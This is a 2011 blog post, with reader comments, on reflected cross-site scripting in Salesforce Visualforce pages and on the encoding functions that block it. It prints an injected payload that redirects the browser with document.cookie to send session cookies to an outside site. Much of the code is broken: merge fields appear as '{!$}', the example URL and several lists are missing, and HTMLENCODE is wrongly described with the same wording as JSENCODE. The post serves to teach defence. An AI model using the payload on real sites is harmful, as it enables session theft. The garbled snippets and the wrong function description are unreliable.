Saturday, 19 February 2011

Salesforce applications with security : Reflected XSS

XSS is also known as cross site scripting.  XSS allows a attackers to inject his code in client script.This is a web application vulnerabilities which allows a attackers to bypass the sharing rules . By doing this he can expose the sensitive data, session cookies etc. also.

Now coming back to the reflected XSS, it impacts the page while page is getting load. Suppose I have a block of script and I want to execute a script on page load. This is known as Reflected XSS.

Let's have a close look:
Here is a page , in the script block we are fetching an Id Parameter
var xssExample = '{!$}' ;

Now have a deep look:
Page is called as :

So when the page will be loaded it will be executed in following manner:
 var xssExample = '{!$}' ;
putting the id value from the request parameter :
var xssExample = 'idvalue';1';document.location=''%2Bdocument.cookie;var%20foo=';

So here you can see that all the cookies will be sent to the site.

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.

So the code explained above can be  updated as :
var xssExample = '{!JSENCODE($})' ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.


  1. Here is the source of information :

  2. Indeed a helpful post for those who publish there app on app exchange.

  3. Hi Bhawani,
    If we do encoding at javascript, say({!JSENCODE($})), & again we need to send it by URL parameter, In that case, we have to get it by DECODDing it?